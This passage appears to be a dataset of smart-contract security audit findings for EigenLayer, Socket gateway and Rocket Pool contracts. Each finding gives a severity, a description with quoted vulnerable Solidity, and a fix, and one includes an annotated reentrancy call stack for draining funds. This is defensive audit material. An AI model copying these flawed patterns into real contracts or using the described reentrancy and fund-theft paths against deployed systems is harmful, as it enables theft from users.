These two functions also have non-view counterparts: `sharesToUnderlying` and `underlyingToShares`, and their NatSpec documentation explicitly states that they should be allowed to make state changes. Given the scope of this engagement, it is unclear if these non-view versions are needed, but assuming they are, this does currently not work as intended.\\nFirst, the interface `IStrategy` declares `underlyingToShares` as `view` (unlike sharesToUnderlying). This means overriding this function in derived contracts is impossible without the `view` modifier. Hence, in `StrategyBase` - which implements the `IStrategy` interface - this (virtual) function is (and has to be) `view`. The same applies to overridden versions of this function in contracts inherited from `StrategyBase`.\\n```\\n/\\*\\*\\n \\* @notice Used to convert an amount of underlying tokens to the equivalent amount of shares in this strategy.\\n \\* @notice In contrast to `underlyingToSharesView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountUnderlying is the amount of `underlyingToken` to calculate its conversion into strategy shares\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction underlyingToShares(uint256 amountUnderlying) external view returns (uint256);\\n```\\n\\n```\\n/\\*\\*\\n \\* @notice Used to convert an amount of underlying tokens to the equivalent amount of shares in this strategy.\\n \\* @notice In contrast to `underlyingToSharesView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountUnderlying is the amount of `underlyingToken` to calculate its conversion into strategy shares\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction underlyingToShares(uint256 amountUnderlying) external view virtual returns (uint256) {\\n return underlyingToSharesView(amountUnderlying);\\n}\\n```\\n\\nAs 
mentioned above, the `sharesToUnderlying` function does not have the `view` modifier in the interface `IStrategy`. However, the overridden (and virtual) version in `StrategyBase` does, which means again that overriding this function in contracts inherited from `StrategyBase` is impossible without the `view` modifier.\\n```\\n/\\*\\*\\n \\* @notice Used to convert a number of shares to the equivalent amount of underlying tokens for this strategy.\\n \\* @notice In contrast to `sharesToUnderlyingView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountShares is the amount of shares to calculate its conversion into the underlying token\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction sharesToUnderlying(uint256 amountShares) public view virtual override returns (uint256) {\\n return sharesToUnderlyingView(amountShares);\\n}\\n```\\n\\nB. The `initialize` function in the `StrategyBase` contract is not virtual, which means the name will not be available in derived contracts (unless with different parameter types). It also has the `initializer` modifier, which is unavailable in concrete strategies inherited from `StrategyBase`.чA. If state-changing versions of the conversion functions are needed, the `view` modifier has to be removed from `IStrategy.underlyingToShares`, `StrategyBase.underlyingToShares`, and `StrategyBase.sharesToUnderlying`. They should be removed entirely from the interface and base contract if they're not needed.\\nB. 
Consider making the `StrategyBase` contract `abstract`, maybe give the `initialize` function a more specific name such as `_initializeStrategyBase`, change its visibility to `internal`, and use the `onlyInitializing` modifier instead of `initializer`.чч```\\n/\\*\\*\\n \\* @notice Used to convert an amount of underlying tokens to the equivalent amount of shares in this strategy.\\n \\* @notice In contrast to `underlyingToSharesView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountUnderlying is the amount of `underlyingToken` to calculate its conversion into strategy shares\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction underlyingToShares(uint256 amountUnderlying) external view returns (uint256);\\n```\\n -StrategyManager - Cross-Chain Replay Attacks After Chain Split Due to Hard-Coded DOMAIN_SEPARATORчlowчA. The `StrategyManager` contract allows stakers to deposit into and withdraw from strategies. A staker can either deposit themself or have someone else do it on their behalf, where the latter requires an EIP-712-compliant signature. The EIP-712 domain separator is computed in the `initialize` function and stored in a state variable for later retrieval:\\n```\\n/// @notice EIP-712 Domain separator\\nbytes32 public DOMAIN\\_SEPARATOR;\\n```\\n\\n```\\nfunction initialize(address initialOwner, address initialStrategyWhitelister, IPauserRegistry \\_pauserRegistry, uint256 initialPausedStatus, uint256 \\_withdrawalDelayBlocks)\\n external\\n initializer\\n{\\n DOMAIN\\_SEPARATOR = keccak256(abi.encode(DOMAIN\\_TYPEHASH, bytes(\"EigenLayer\"), block.chainid, address(this)));\\n```\\n\\nOnce set in the `initialize` function, the value can't be changed anymore. In particular, the chain ID is “baked into” the `DOMAIN_SEPARATOR` during initialization. 
However, it is not necessarily constant: In the event of a chain split, only one of the resulting chains gets to keep the original chain ID, and the other should use a new one. With the current approach to compute the `DOMAIN_SEPARATOR` during initialization, store it, and then use the stored value for signature verification, a signature will be valid on both chains after a split - but it should not be valid on the chain with the new ID. Hence, the domain separator should be computed dynamically.\\nB. The `name` in the `EIP712Domain` is of type string:\\n```\\nbytes32 public constant DOMAIN\\_TYPEHASH =\\n keccak256(\"EIP712Domain(string name,uint256 chainId,address verifyingContract)\");\\n```\\n\\nWhat's encoded when the domain separator is computed is bytes(\"EigenLayer\"):\\n```\\nDOMAIN\\_SEPARATOR = keccak256(abi.encode(DOMAIN\\_TYPEHASH, bytes(\"EigenLayer\"), block.chainid, address(this)));\\n```\\n\\nAccording to EIP-712,\\nThe dynamic values `bytes` and `string` are encoded as a `keccak256` hash of their contents.\\nHence, `bytes(\"EigenLayer\")` should be replaced with `keccak256(bytes(\"EigenLayer\"))`.\\nC. The `EIP712Domain` does not include a version string:\\n```\\nbytes32 public constant DOMAIN\\_TYPEHASH =\\n keccak256(\"EIP712Domain(string name,uint256 chainId,address verifyingContract)\");\\n```\\n\\nThat is allowed according to the specification. However, given that most, if not all, projects, as well as OpenZeppelin's EIP-712 implementation, do include a version string in their `EIP712Domain`, it might be a pragmatic choice to do the same, perhaps to avoid potential incompatibilities.чIndividual recommendations have been given above. Alternatively, you might want to utilize OpenZeppelin's `EIP712Upgradeable` library, which will take care of these issues. 
Note that some of these changes will break existing signatures.чч```\\n/// @notice EIP-712 Domain separator\\nbytes32 public DOMAIN\\_SEPARATOR;\\n```\\n -StrategyManagerStorage - Miscalculated Gap SizeчlowчUpgradeable contracts should have a “gap” of unused storage slots at the end to allow for adding state variables when the contract is upgraded. The convention is to have a gap whose size adds up to 50 with the used slots at the beginning of the contract's storage.\\nIn `StrategyManagerStorage`, the number of consecutively used storage slots is 10:\\n`DOMAIN_SEPARATOR`\\n`nonces`\\n`strategyWhitelister`\\n`withdrawalDelayBlocks`\\n`stakerStrategyShares`\\n`stakerStrategyList`\\n`withdrawalRootPending`\\n`numWithdrawalsQueued`\\n`strategyIsWhitelistedForDeposit`\\n`beaconChainETHSharesToDecrementOnWithdrawal`\\nHowever, the gap size in the storage contract is 41:\\n```\\nuint256[41] private \\_\\_gap;\\n```\\nчIf you don't have to maintain compatibility with an existing deployment, we recommend reducing the storage gap size to 40. Otherwise, we recommend adding a comment explaining that, in this particular case, the gap size and the used storage slots should add up to 51 instead of 50 and that this invariant has to be maintained in future versions of this contract.чч```\\nuint256[41] private \\_\\_gap;\\n```\\n -Funds Refunded From Celer Bridge Might Be Stolenчhighч```\\nif (!router.withdraws(transferId)) {\\n router.withdraw(\\_request, \\_sigs, \\_signers, \\_powers);\\n}\\n```\\n\\nFrom the point of view of the Celer bridge, the initial depositor of the tokens is the `SocketGateway`. As a consequence, the Celer contract transfers the tokens to be refunded to the gateway. The gateway is then in charge of forwarding the tokens to the initial depositor. To achieve this, it keeps a mapping of unique transfer IDs to depositor addresses. 
Once a refund is processed, the corresponding address in the mapping is reset to the zero address.\\nLooking at the `withdraw` function of the Celer pool, we see that for some tokens, it is possible that the reimbursement will not be processed directly, but only after some delay. From the gateway point of view, the reimbursement will be marked as successful, and the address of the original sender corresponding to this transfer ID will be reset to address(0).\\n```\\nif (delayThreshold > 0 && wdmsg.amount > delayThreshold) {\\n _addDelayedTransfer(wdId, wdmsg.receiver, wdmsg.token, wdmsg. // <--- here\\n} else {\\n _sendToken(wdmsg.receiver, wdmsg.token, wdmsg.\\n}\\n```\\n\\nIt is then the responsibility of the user, once the locking delay has passed, to call another function to claim the tokens. Unfortunately, in our case, this means that the funds will be sent back to the gateway contract and not to the original sender. Because the gateway implements `rescueEther`, and `rescueFunds` functions, the admin might be able to send the funds back to the user. However, this requires manual intervention and breaks the trustlessness assumptions of the system. Also, in that case, there is no easy way to trace back the original address of the sender, that corresponds to this refund.\\nHowever, there is an additional issue that might allow an attacker to steal some funds from the gateway. Indeed, when claiming the refund, if it is in ETH, the gateway will have some balance when the transaction completes. Any user can then call any function that consumes the gateway balance, such as the `swapAndBridge` from `CelerImpl`, to steal the refunded ETH. That is possible as the function relies on a user-provided amount as an input, and not on `msg.value`. 
Additionally, if the refund is an ERC-20, an attacker can steal the funds by calling `bridgeAfterSwap` or `swapAndBridge` from the `Stargate` or `Celer` routes with the right parameters.\\n```\\nfunction bridgeAfterSwap(\\n uint256 amount,\\n bytes calldata bridgeData\\n) external payable override {\\n CelerBridgeData memory celerBridgeData = abi.decode(\\n bridgeData,\\n (CelerBridgeData)\\n );\\n```\\n\\n```\\nfunction swapAndBridge(\\n uint32 swapId,\\n bytes calldata swapData,\\n StargateBridgeDataNoToken calldata stargateBridgeData\\n```\\n\\nNote that this violates the security assumption: “The contracts are not supposed to hold any funds post-tx execution.”чMake sure that `CelerImpl` supports also the delayed withdrawals functionality and that withdrawal requests are deleted only if the receiver has received the withdrawal in a single transaction.чч```\\nif (!router.withdraws(transferId)) {\\n router.withdraw(\\_request, \\_sigs, \\_signers, \\_powers);\\n}\\n```\\n -Calls Made to Non-Existent/Removed Routes or Controllers Will Not Result in FailureчhighчThis issue was found in commit hash `a8d0ad1c280a699d88dc280d9648eacaf215fb41`.\\nIn the Ethereum Virtual Machine (EVM), `delegatecall` will succeed for calls to externally owned accounts and more specifically to the zero address, which presents a potential security risk. 
We have identified multiple instances of `delegatecall` being used to invoke smart contract functions.\\nThis, combined with the fact that routes can be removed from the system by the owner of the `SocketGateway` contract using the `disableRoute` function, makes it possible for the user's funds to be lost in case an `executeRoute` transaction (for instance) that's waiting in the mempool is eventually front-run by a call to `disableRoute`.\\n```\\n(bool success, bytes memory result) = addressAt(routeId).delegatecall(\\n```\\n\\n```\\n.delegatecall(swapData);\\n```\\n\\n```\\n.delegatecall(swapData);\\n```\\n\\n```\\n.delegatecall(swapData);\\n```\\n\\n```\\n.delegatecall(data);\\n```\\n\\nEven after the upgrade to commit hash `d0841a3e96b54a9d837d2dba471aa0946c3c8e7b`, the following bug is still present:\\nTo optimize gas usage, the `addressAt` function in `socketGateway` uses a binary search in a hard-coded table to resolve a `routeID` (routeID <= 512) to a contract address. This is made possible thanks to the factory using the `CREATE2` pattern. This allows pre-computing future addresses of contracts before they are deployed. In case the `routeID` is strictly greater than 512, `addressAt` falls back to fetching the address from a state mapping (routes).\\nThe new commit hash adds a check to make sure that the call to the `addressAt` function reverts in case a `routeID` is not present in the `routes` mapping. This prevents delegate-calling to non-existent addresses in various places of the code. However, this does not solve the issue for the hard-coded route addresses (i.e., `routeID` <= 512). In that case, the `addressAt` function still returns a valid route contract address, despite the contract not being deployed yet. 
This will result in a successful `delegatecall` later in the code and might lead to various side-effects.\\n```\\nfunction addressAt(uint32 routeId) public view returns (address) {\\n if (routeId < 513) {\\n if (routeId < 257) {\\n if (routeId < 129) {\\n if (routeId < 65) {\\n if (routeId < 33) {\\n if (routeId < 17) {\\n if (routeId < 9) {\\n if (routeId < 5) {\\n if (routeId < 3) {\\n if (routeId == 1) {\\n return\\n 0x822D4B4e63499a576Ab1cc152B86D1CFFf794F4f;\\n } else {\\n return\\n 0x822D4B4e63499a576Ab1cc152B86D1CFFf794F4f;\\n }\\n } else {\\n```\\n\\n```\\nif (routes[routeId] == address(0)) revert ZeroAddressNotAllowed();\\nreturn routes[routeId];\\n```\\nчConsider adding a check to validate that the callee of a `delegatecall` is indeed a contract, you may refer to the Address library by OZ.чч```\\n(bool success, bytes memory result) = addressAt(routeId).delegatecall(\\n```\\n -Owner Can Add Arbitrary Code to Be Executed From the SocketGateway ContractчmediumчThe Socket system is managed by the `SocketGateway` contract that maintains all routes and controller addresses within its state. There, the address with the `Owner` role of the `SocketGateway` contract can add new routes and controllers that would have a `delegatecall()` executed upon them from the `SocketGateway` so user transactions can go through the logic required for the bridge, swap, or any other solution integrated with Socket. These routes and controllers would then have arbitrary code that is entirely up to the `Owner`, though users are not required to go through any specific routes and can decide which routes to pick.\\nSince these routes are called via `delegatecall()`, they don't hold any storage variables that would be used in the Socket systems. However, as Socket aggregates more solutions, unexpected complexities may arise that could require storing and accessing variables through additional contracts. 
Those contracts would be access control protected to only have the `SocketGateway` contract have the privileges to modify its variables.\\nThis together with the `Owner` of the `SocketGateway` being able to add routes with arbitrary code creates an attack vector where a compromised address with `Owner` privileges may add a route that would contain code that exploits the special privileges assigned to the `SocketGateway` contract for their benefit.\\nFor example, the Celer bridge needs extra logic to account for its refund mechanism, so there is an additional `CelerStorageWrapper` contract that maintains a mapping between individual bridge transfer transactions and their associated msg.sender:\\n```\\ncelerStorageWrapper.setAddressForTransferId(transferId, msg.sender);\\n```\\n\\n```\\n/\\*\\*\\n \\* @title CelerStorageWrapper\\n \\* @notice handle storageMappings used while bridging ERC20 and native on CelerBridge\\n \\* @dev all functions ehich mutate the storage are restricted to Owner of SocketGateway\\n \\* @author Socket dot tech.\\n \\*/\\ncontract CelerStorageWrapper {\\n```\\n\\nConsequently, this contract has access-protected functions that may only be called by the SocketGateway to set and delete the transfer IDs:\\n```\\nfunction setAddressForTransferId(\\n```\\n\\n```\\nfunction deleteTransferId(bytes32 transferId) external {\\n```\\n\\nA compromised `Owner` of SocketGateway could then create a route that calls into the `CelerStorageWrapper` contract and updates the transfer IDs associated addresses to be under their control via `deleteTransferId()` and `setAddressForTransferId()` functions. This could create a significant drain of user funds, though, it depends on a compromised privileged `Owner` address.чAlthough it may indeed be unlikely, for aggregating solutions it is especially important to try and minimize compromised access issues. 
As future solutions require more complexity, consider architecting their integrations in such a way that they require as few administrative and SocketGateway-initiated transactions as possible. Through conversations with the Socket team, it appears that solutions such as timelocks on adding new routes are being considered as well, which would help catch the problem before it appears as well.чч```\\ncelerStorageWrapper.setAddressForTransferId(transferId, msg.sender);\\n```\\n -Dependency on Third-Party APIs to Create the Right PayloadчmediumчThe Socket system of routes and controllers integrates swaps, bridges, and potentially other solutions that are vastly different from each other. The function arguments that are required to execute them may often seem like a black box of a payload for a typical end user. In fact, even when users explicitly provide a destination `token` with an associated `amount` for a swap, these arguments themselves might not even be fully (or at all) used in the route itself. Instead, often the routes and controllers accept a `bytes` payload that contains all the necessary data for its action. These data payloads are generated off-chain, often via centralized APIs provided by the integrated systems themselves, which is understandable in isolation as they have to be generated somewhere at some point. However, the provided `bytes` do not get checked for their correctness or matching with the other arguments that the user explicitly provided. Even the events that get emitted refer to the individual arguments of functions as opposed to what actually was being used to execute the logic.\\nFor example, the implementation route for the 1inch swaps explicitly asks the user to provide `fromToken`, `toToken`, `amount`, and `receiverAddress`, however only `fromToken` and `amount` are used meaningfully to transfer the `amount` to the SocketGateway and approve the `fromToken` to be spent by the 1inch contract. 
Everything else is dictated by `swapExtraData`, including even the true `amount` that is getting swapped. A mishap in the API providing this data payload could cause much less of a token `amount` to be swapped, a wrong address to receive the swap, and even the wrong destination token to return.\\n```\\n// additional data is generated in off-chain using the OneInch API which takes in\\n// fromTokenAddress, toTokenAddress, amount, fromAddress, slippage, destReceiver, disableEstimate\\n(bool success, bytes memory result) = ONEINCH\\_AGGREGATOR.call(\\n swapExtraData\\n);\\n```\\n\\nEven the event at the end of the transaction partially refers to the explicitly provided arguments instead of those that actually facilitated the execution of logic\\n```\\nemit SocketSwapTokens(\\n fromToken,\\n toToken,\\n returnAmount,\\n amount,\\n OneInchIdentifier,\\n receiverAddress\\n);\\n```\\n\\nAs Socket aggregates other solutions, it naturally incurs the trust assumptions and risks associated with its integrations. In some ways, they even stack on top of each other, especially in those Socket functions that batch several routes together - all of them and their associated API calls need to return the correct payloads. So, there is an opportunity to minimize these risks by introducing additional checks into the contracts that would verify the correctness of the payloads that are passed over to the routes and controllers. 
In fact, creating these payloads within the contracts would allow other systems to integrate Socket more simply as they could just call the functions with primary logical arguments such as the source token, destination token, and amount.чConsider allocating additional checks within the route implementations that ensure that the explicitly passed arguments match what is being sent for execution to the integrated solutions, like in the above example with the 1inch implementation.чч```\\n// additional data is generated in off-chain using the OneInch API which takes in\\n// fromTokenAddress, toTokenAddress, amount, fromAddress, slippage, destReceiver, disableEstimate\\n(bool success, bytes memory result) = ONEINCH\\_AGGREGATOR.call(\\n swapExtraData\\n);\\n```\\n -NativeOptimismImpl - Events Will Not Be Emitted in Case of Non-Native Tokens BridgingчmediumчIn the case of the usage of non-native tokens by users, the `SocketBridge` event will not be emitted since the code will return early.\\n```\\nfunction bridgeAfterSwap(\\n```\\n\\n```\\nfunction swapAndBridge(\\n```\\n\\n```\\nfunction bridgeERC20To(\\n```\\nчMake sure that the `SocketBridge` event is emitted for non-native tokens as well.чч```\\nfunction bridgeAfterSwap(\\n```\\n -Inconsistent CommentsчlowчSome of the contracts in the code have incorrect developer comments annotated for them. This could create confusion for future readers of this code that may be trying to maintain, audit, update, fork, integrate it, and so on.\\n```\\n/\\*\\*\\n \\* @notice function to bridge tokens after swap. 
This is used after swap function call\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in Stargate-BridgeData struct\\n \\* @param swapId routeId for the swapImpl\\n \\* @param swapData encoded data for swap\\n \\* @param stargateBridgeData encoded data for StargateBridgeData\\n \\*/\\nfunction swapAndBridge(\\n```\\n\\nThis is the same comment as `bridgeAfterSwap`, whereas it instead does swapping and bridging together\\n```\\n/\\*\\*\\n \\* @notice function to store the transferId and message-sender of a bridging activity\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in CelerBridgeData struct\\n \\* @param transferId transferId generated during the bridging of ERC20 or native on CelerBridge\\n \\* @param transferIdAddress message sender who is making the bridging on CelerBridge\\n \\*/\\nfunction setAddressForTransferId(\\n```\\n\\nThis comment refers to a payable property of this function when it isn't.\\n```\\n/\\*\\*\\n \\* @notice function to store the transferId and message-sender of a bridging activity\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in CelerBridgeData struct\\n \\* @param transferId transferId generated during the bridging of ERC20 or native on CelerBridge\\n \\*/\\nfunction deleteTransferId(bytes32 transferId) external {\\n```\\n\\nThis comment is copied from the above function when it does the opposite of storing - it deletes the `transferId`чAdjust comments so they reflect what the functions 
are actually doing.чч```\\n/\\*\\*\\n \\* @notice function to bridge tokens after swap. This is used after swap function call\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in Stargate-BridgeData struct\\n \\* @param swapId routeId for the swapImpl\\n \\* @param swapData encoded data for swap\\n \\* @param stargateBridgeData encoded data for StargateBridgeData\\n \\*/\\nfunction swapAndBridge(\\n```\\n -Unused Error Codes.чlowч`error RouteAlreadyExist();`\\n`error ContractContainsNoCode();`\\n`error ControllerAlreadyExist();`\\n`error ControllerAddressIsZero();`\\nIt seems that they were created as errors that may have been expected to occur during the early stages of development, but the resulting architecture doesn't seem to have a place for them currently.\\n```\\nerror RouteAlreadyExist();\\nerror SwapFailed();\\nerror UnsupportedInterfaceId();\\nerror ContractContainsNoCode();\\nerror InvalidCelerRefund();\\nerror CelerAlreadyRefunded();\\nerror ControllerAlreadyExist();\\nerror ControllerAddressIsZero();\\n```\\nчResolution\\nRemediated as per the client team in SocketDotTech/socket-ll-contracts#148.\\nConsider revisiting these errors and identifying whether they need to remain or can be removed.чч```\\nerror RouteAlreadyExist();\\nerror SwapFailed();\\nerror UnsupportedInterfaceId();\\nerror ContractContainsNoCode();\\nerror InvalidCelerRefund();\\nerror CelerAlreadyRefunded();\\nerror ControllerAlreadyExist();\\nerror ControllerAddressIsZero();\\n```\\n -Inaccurate Interface.чlowч`ISocketGateway` implies a `bridge(uint32 routeId, bytes memory data)` function, but there is no socket contract with a function like that, including the `SocketGateway` contract.\\n```\\nfunction bridge(\\n uint32 routeId,\\n bytes memory data\\n) external payable returns (bytes 
memory);\\n```\\nчAdjust the interface.чч```\\nfunction bridge(\\n uint32 routeId,\\n bytes memory data\\n) external payable returns (bytes memory);\\n```\\n -Validate Array Length Matching Before Execution to Avoid RevertsчlowчThe Socket system not only aggregates different solutions via its routes and controllers but also allows to batch calls between them into one transaction. For example, a user may call swaps between several DEXs and then perform a bridge transfer.\\nAs a result, the `SocketGateway` contract has many functions that accept multiple arrays that contain the necessary data for execution in their respective routes. However, these arrays need to be of the same length because individual elements in the arrays are intended to be matched at the same indices:\\n```\\nfunction executeRoutes(\\n uint32[] calldata routeIds,\\n bytes[] calldata dataItems,\\n bytes[] calldata eventDataItems\\n) external payable {\\n uint256 routeIdslength = routeIds.length;\\n for (uint256 index = 0; index < routeIdslength; ) {\\n (bool success, bytes memory result) = addressAt(routeIds[index])\\n .delegatecall(dataItems[index]);\\n\\n if (!success) {\\n assembly {\\n revert(add(result, 32), mload(result))\\n }\\n }\\n\\n emit SocketRouteExecuted(routeIds[index], eventDataItems[index]);\\n\\n unchecked {\\n ++index;\\n }\\n }\\n}\\n```\\n\\nNote that in the above example function, all 3 different calldata arrays `routeIds`, `dataItems`, and `eventDataItems` were utilizing the same `index` to retrieve the correct element. 
A common practice in such cases is to confirm that the sizes of the arrays match before continuing with the execution of the rest of the transaction to avoid costly reverts that could happen due to “Index out of bounds” error.\\nDue to the aggregating and batching nature of the Socket system that may have its users rely on 3rd party offchain APIs to construct these array payloads, such as from APIs of the systems that Socket is integrating, a mishap in just any one of them could cause this issue.чImplement a check on the array lengths so they match.чч```\\nfunction executeRoutes(\\n uint32[] calldata routeIds,\\n bytes[] calldata dataItems,\\n bytes[] calldata eventDataItems\\n) external payable {\\n uint256 routeIdslength = routeIds.length;\\n for (uint256 index = 0; index < routeIdslength; ) {\\n (bool success, bytes memory result) = addressAt(routeIds[index])\\n .delegatecall(dataItems[index]);\\n\\n if (!success) {\\n assembly {\\n revert(add(result, 32), mload(result))\\n }\\n }\\n\\n emit SocketRouteExecuted(routeIds[index], eventDataItems[index]);\\n\\n unchecked {\\n ++index;\\n }\\n }\\n}\\n```\\n -Destroyed Routes Eth Balances Will Be Left Locked in SocketDeployFactoryчlowч`SocketDeployFactory.destroy` calls the `killme` function which in turn self-destructs the route and sends back any eth to the factory contract. However, these funds can not be claimed from the `SocketDeployFactory` contract.\\n```\\nfunction destroy(uint256 routeId) external onlyDisabler {\\n```\\nчMake sure that these funds can be claimed.чч```\\nfunction destroy(uint256 routeId) external onlyDisabler {\\n```\\n -RocketNodeDistributorDelegate - Reentrancy in distribute() allows node owner to drain distributor fundsчhighчThe `distribute()` function distributes the contract's balance between the node operator and the user. The node operator is returned their initial collateral, including a fee. 
The rest is returned to the RETH token contract as user collateral.\\nAfter determining the node owner's share, the contract transfers `ETH` to the node withdrawal address, which can be the configured withdrawal address or the node address. Both addresses may potentially be a malicious contract that recursively calls back into the `distribute()` function to retrieve the node share multiple times until all funds are drained from the contract. The `distribute()` function is not protected against reentrancy:\\n```\\n/// @notice Distributes the balance of this contract to its owners\\nfunction distribute() override external {\\n // Calculate node share\\n uint256 nodeShare = getNodeShare();\\n // Transfer node share\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n (bool success,) = withdrawalAddress.call{value : nodeShare}(\"\");\\n require(success);\\n // Transfer user share\\n uint256 userShare = address(this).balance;\\n address rocketTokenRETH = rocketStorage.getAddress(rocketTokenRETHKey);\\n payable(rocketTokenRETH).transfer(userShare);\\n // Emit event\\n emit FeesDistributed(nodeAddress, userShare, nodeShare, block.timestamp);\\n}\\n```\\n\\nWe also noticed that any address could set a withdrawal address as there is no check for the caller to be a registered node. 
In fact, the caller can be the withdrawal address or node operator.\\n```\\n// Set a node's withdrawal address\\nfunction setWithdrawalAddress(address \\_nodeAddress, address \\_newWithdrawalAddress, bool \\_confirm) external override {\\n // Check new withdrawal address\\n require(\\_newWithdrawalAddress != address(0x0), \"Invalid withdrawal address\");\\n // Confirm the transaction is from the node's current withdrawal address\\n address withdrawalAddress = getNodeWithdrawalAddress(\\_nodeAddress);\\n require(withdrawalAddress == msg.sender, \"Only a tx from a node's withdrawal address can update it\");\\n // Update immediately if confirmed\\n if (\\_confirm) {\\n updateWithdrawalAddress(\\_nodeAddress, \\_newWithdrawalAddress);\\n }\\n // Set pending withdrawal address if not confirmed\\n else {\\n pendingWithdrawalAddresses[\\_nodeAddress] = \\_newWithdrawalAddress;\\n }\\n}\\n```\\nчResolution\\nFixed in https://github.com/rocket-pool/rocketpool/tree/77d7cca65b7c0557cfda078a4fc45f9ac0cc6cc6 by implementing a custom reentrancy guard via a new state variable `lock` that is appended to the end of the storage layout. The reentrancy guard is functionally equivalent to the OpenZeppelin implementation. The method was not refactored to give user funds priority over the node share. Additionally, the client provided the following statement:\\nWe acknowledge this as a critical issue and have solved with a reentrancy guard.\\nWe followed OpenZeppelin's design for a reentrancy guard. We were unable to use it directly as it is hardcoded to use storage slot 0 and because we already have deployment of this delegate in the wild already using storage slot 0 for another purpose, we had to append it to the end of the existing storage layout.\\nAdd a reentrancy guard to functions that interact with untrusted contracts. Adhere to the checks-effects pattern and send user funds to the ‘trusted' RETH contract first. 
Only then send funds to the node's withdrawal address.чч```\\n/// @notice Distributes the balance of this contract to its owners\\nfunction distribute() override external {\\n // Calculate node share\\n uint256 nodeShare = getNodeShare();\\n // Transfer node share\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n (bool success,) = withdrawalAddress.call{value : nodeShare}(\"\");\\n require(success);\\n // Transfer user share\\n uint256 userShare = address(this).balance;\\n address rocketTokenRETH = rocketStorage.getAddress(rocketTokenRETHKey);\\n payable(rocketTokenRETH).transfer(userShare);\\n // Emit event\\n emit FeesDistributed(nodeAddress, userShare, nodeShare, block.timestamp);\\n}\\n```\\n -RocketMinipoolDelegateOld - Node operator may reenter finalise() to manipulate accountingчhighчIn the old Minipool delegate contract, a node operator may call the `finalise()` function to finalize a Minipool. As part of this process, a call to `_refund()` may be performed if there is a node refund balance to be transferred. This will send an amount of `nodeRefundBalance` in ETH to the `nodeWithdrawalAddress` via a low-level call, handing over control flow to an - in terms of the system - untrusted external account that this node operator controls. 
The node operator, therefore, is granted to opportunity to call back into `finalise()`, which is not protected against reentrancy and violates the checks-effects-interactions pattern (finalised = true is only set at the very end), to manipulate the following system settings:\\nnode.minipools.finalised.count: NodeAddress finalised count increased twice instead\\nminipools.finalised.count: global finalised count increased twice\\n`eth.matched.node.amount` - NodeAddress eth matched amount potentially reduced too many times; has an impact on `getNodeETHCollateralisationRatio -> GetNodeShare`, `getNodeETHProvided -> getNodeEffectiveRPLStake` and `getNodeETHProvided->getNodeMaximumRPLStake->withdrawRPL` and is the limiting factor when withdrawing RPL to ensure the pools stay collateralized.\\nNote: `RocketMinipoolDelegateOld` is assumed to be the currently deployed MiniPool implementation. Users may upgrade from this delegate to the new version and can roll back at any time and re-upgrade, even within the same transaction (see issue 5.3 ).\\nThe following is an annotated call stack from a node operator calling `minipool.finalise()` reentering `finalise()` once more on their Minipool:\\n```\\nfinalise() --> \\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n _refund()\\n nodeRefundBalance = 0 //<-- reset refund balance\\n ---> extCall: nodeWithdrawalAddress\\n ---> reenter: finalise()\\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n nodeRefundBalance > 0 //<-- false; no refund()\\n address(this).balance to RETH\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral()\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress) //<-- 1st time\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); \\n finalised = true;\\n <--- return from reentrant 
call\\n <--- return from _refund()\\n address(this).balance to RETH //<-- NOP as balance was sent to RETH already\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral(); //<-- does not revert\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress); //<-- no revert, increases\\n 'node.minipools.finalised.count', 'minipools.finalised.count', reduces 'eth.matched.node.amount' one to\\n many times\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); //<-- manipulates\\n 'member.validator.unbonded.count' by +1\\n finalised = true; //<-- is already 'true', gracefully continues\\n<--- returns \\n```\\n\\n```\\n// Called by node operator to finalise the pool and unlock their RPL stake\\nfunction finalise() external override onlyInitialised onlyMinipoolOwnerOrWithdrawalAddress(msg.sender) {\\n // Can only call if withdrawable and can only be called once\\n require(status == MinipoolStatus.Withdrawable, \"Minipool must be withdrawable\");\\n // Node operator cannot finalise the pool unless distributeBalance has been called\\n require(withdrawalBlock > 0, \"Minipool balance must have been distributed at least once\");\\n // Finalise the pool\\n \\_finalise();\\n}\\n```\\n\\n`_refund()` handing over control flow to `nodeWithdrawalAddress`\\n```\\n// Perform any slashings, refunds, and unlock NO's stake\\nfunction \\_finalise() private {\\n // Get contracts\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(\"rocketMinipoolManager\"));\\n // Can only finalise the pool once\\n require(!finalised, \"Minipool has already been finalised\");\\n // If slash is required then perform it\\n if (nodeSlashBalance > 0) {\\n \\_slash();\\n }\\n // Refund node operator if required\\n if (nodeRefundBalance > 0) {\\n \\_refund();\\n }\\n // Send any left over ETH to rETH contract\\n if (address(this).balance > 0) {\\n // Send user amount to 